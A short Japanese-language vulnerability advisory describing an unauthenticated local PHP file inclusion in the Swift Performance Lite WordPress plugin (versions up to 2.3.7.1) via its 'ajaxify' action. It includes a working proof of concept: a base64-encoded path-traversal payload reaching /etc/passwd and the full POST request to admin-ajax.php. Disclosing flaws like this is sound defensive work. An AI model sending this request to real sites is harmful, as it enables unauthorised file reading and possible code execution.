
Swift Performance Lite <= 2.3.7.1 - 'ajaxify' 経由の未認証ローカルPHPファイルインクルード
Swift Performance Lite <= 2.3.7.1 - 'ajaxify' 経由の未認証ローカルPHPファイルインクルード
WordPress用プラグインSwift Performance Liteは、'ajaxify' 関数を介して、2.3.7.1を含むそれ以前の全バージョンにおいて、ローカルPHPファイルインクルードの脆弱性の影響を受けます。これにより、未認証の攻撃者がサーバー上の任意のファイルをインクルードして実行することが可能になり、それらのファイル内の任意のPHPコードを実行できるようになります。これは、アクセス制御のバイパス、機密データの取得、または画像やその他の「安全な」ファイルタイプをアップロードしてインクルードできる場合のコード実行の達成に悪用される可能性があります。
Base64ペイロード = ["template-part","null","../../../../../etc/passwd"]
POST /wp-admin/admin-ajax.php HTTP/2
Host: wp-dev.ddev.site
Content-Type: application/x-www-form-urlencoded
Content-Length: 202
action=swift_performance_ajaxify&data=WyJ0ZW1wbGF0ZS1wYXJ0IiwibnVsbCIsIi4uLy4uLy4uLy4uLy4uL2V0Yy9wYXNzd2QiXQ==